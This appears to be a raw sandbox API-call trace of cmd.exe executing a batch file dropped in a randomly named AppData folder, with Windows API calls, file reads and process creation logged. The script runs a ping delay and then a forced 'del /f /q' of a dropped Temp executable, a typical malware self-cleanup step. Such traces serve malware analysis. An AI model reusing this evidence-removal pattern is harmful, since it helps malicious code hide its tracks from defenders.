(_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", _String2=")") returned 58 [0109.129] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 3 [0109.129] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 3 [0109.129] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 6 [0109.129] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 6 [0109.129] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 15 [0109.129] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd") returned 15 [0109.130] GetConsoleTitleW (in: lpConsoleTitle=0x22f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f51c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f514, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f514*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.180] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0109.180] SetErrorMode (uMode=0x0) returned 0x0 [0109.180] SetErrorMode (uMode=0x1) returned 0x0 [0109.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x42dc08, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f280*="vMfCCeRYkvQy") returned 0x2d [0109.180] SetErrorMode (uMode=0x0) returned 0x1 [0109.180] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0109.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.185] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.185] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", fInfoLevelId=0x1, lpFindFileData=0x22f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f01c) returned 0x4208f0 [0109.185] FindClose (in: hFindFile=0x4208f0 | out: hFindFile=0x4208f0) returned 1 [0109.185] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0109.185] GetConsoleTitleW (in: lpConsoleTitle=0x22f4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.185] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0109.188] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0109.188] IdentifyCodeAuthzLevelW () returned 0x1 [0109.195] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0109.195] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0109.195] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0109.195] CloseCodeAuthzLevel () returned 0x1 [0109.195] SetErrorMode (uMode=0x0) returned 0x0 [0109.195] SetErrorMode (uMode=0x1) returned 0x0 [0109.195] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", nBufferLength=0x104, lpBuffer=0x4204e8, lpFilePart=0x22f3e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd", lpFilePart=0x22f3e0*="8Nkh0cv7.cmd") returned 0x3a [0109.195] SetErrorMode (uMode=0x0) returned 0x1 [0109.195] CmdBatNotification () returned 0x0 [0109.196] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0109.196] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0109.196] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.196] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.196] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.196] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.196] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x91, lpOverlapped=0x0) returned 1 [0109.197] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0109.197] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.197] GetFileType (hFile=0x58) returned 0x1 [0109.198] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.198] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.198] _wcsicmp (_String1="ping", _String2=")") returned 71 [0109.198] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0109.198] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0109.198] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0109.198] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0109.198] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0109.198] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0109.199] _tell (_FileHandle=3) returned 21 [0109.199] _close (_FileHandle=3) returned 0 [0109.199] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0109.199] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.199] GetFileType (hFile=0x7) returned 0x2 [0109.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.199] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0109.200] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.200] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.200] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0109.200] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] GetFileType (hFile=0x7) returned 0x2 [0109.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.200] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0109.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.200] GetFileType (hFile=0x7) returned 0x2 [0109.201] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) returned 1 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x420958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x420958*, lpNumberOfCharsWritten=0x22f450*=0x4) returned 1 [0109.201] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" -n 3 localhost ") returned 16 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] GetFileType (hFile=0x7) returned 0x2 [0109.201] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0109.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x10) returned 1 [0109.202] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0109.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.202] GetFileType (hFile=0x7) returned 0x2 [0109.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.202] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0109.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.202] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0109.202] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0109.202] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0109.202] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0109.202] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0109.202] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0109.202] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0109.202] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0109.202] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0109.202] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0109.202] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0109.203] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0109.203] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0109.203] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0109.203] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0109.203] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0109.203] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0109.203] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0109.203] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0109.203] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0109.203] _wcsicmp (_String1="ping", _String2="START") returned -3 [0109.203] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0109.203] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0109.203] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0109.203] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0109.203] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0109.203] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0109.203] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0109.203] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0109.203] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0109.203] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0109.204] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.204] SetErrorMode (uMode=0x0) returned 0x0 [0109.204] SetErrorMode (uMode=0x1) returned 0x0 [0109.204] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x430550, lpFilePart=0x22f220 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f220*="Desktop") returned 0x18 [0109.204] SetErrorMode (uMode=0x0) returned 0x1 [0109.204] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.204] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.204] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.204] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] GetLastError () returned 0x2 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] GetLastError () returned 0x2 [0109.205] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0x430838 [0109.205] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0xffffffff [0109.205] GetLastError () returned 0x2 [0109.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ef9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef9c) returned 0x430838 [0109.205] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0109.206] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.206] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.206] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.206] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.206] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.206] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0xffffffff [0109.206] GetLastError () returned 0x2 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0xffffffff [0109.206] GetLastError () returned 0x2 [0109.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0x430d80 [0109.207] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0109.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0xffffffff [0109.207] GetLastError () returned 0x2 [0109.207] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e888, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e888) returned 0x430d80 [0109.207] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0109.207] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0109.207] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0109.207] GetConsoleTitleW (in: lpConsoleTitle=0x22ed80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.207] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ecd0 | out: lpAttributeList=0x22ec08, lpSize=0x22ecd0) returned 1 [0109.207] UpdateProcThreadAttribute (in: lpAttributeList=0x22ec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ec08, lpPreviousValue=0x0) returned 1 [0109.207] GetStartupInfoW (in: lpStartupInfo=0x22ebc4 | out: lpStartupInfo=0x22ebc4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0109.207] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0109.208] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22ec64*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ecb0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22ecb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xcfc, dwThreadId=0xd00)) returned 1 [0109.211] CloseHandle (hObject=0x58) returned 1 [0109.211] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.211] GetEnvironmentStringsW () returned 0x420970* [0109.211] FreeEnvironmentStringsW (penv=0x420970) returned 1 [0109.211] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0111.974] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eba4 | out: lpExitCode=0x22eba4*=0x0) returned 1 [0111.974] CloseHandle (hObject=0x54) returned 1 [0111.974] _vsnwprintf (in: _Buffer=0x22ecec, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ebb0 | out: _Buffer="00000000") returned 8 [0111.974] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0111.974] GetEnvironmentStringsW () returned 0x422c28* [0111.974] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0111.974] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0111.974] GetEnvironmentStringsW () returned 0x422c28* [0111.975] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0111.975] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ec08 | out: lpAttributeList=0x22ec08) [0111.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.975] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.975] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.975] SetConsoleInputExeNameW () returned 0x1 [0111.975] GetConsoleOutputCP () returned 0x1b5 [0111.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.975] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.975] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.975] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.975] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0111.976] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.976] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0111.976] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x7c, lpOverlapped=0x0) returned 1 [0111.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n") returned 62 [0111.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.977] GetFileType (hFile=0x54) returned 0x1 [0111.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.978] _tell (_FileHandle=3) returned 83 [0111.978] _close (_FileHandle=3) returned 0 [0111.978] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0111.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.978] GetFileType (hFile=0x7) returned 0x2 [0111.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0111.979] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0111.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.979] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0111.979] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] GetFileType (hFile=0x7) returned 0x2 [0111.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, 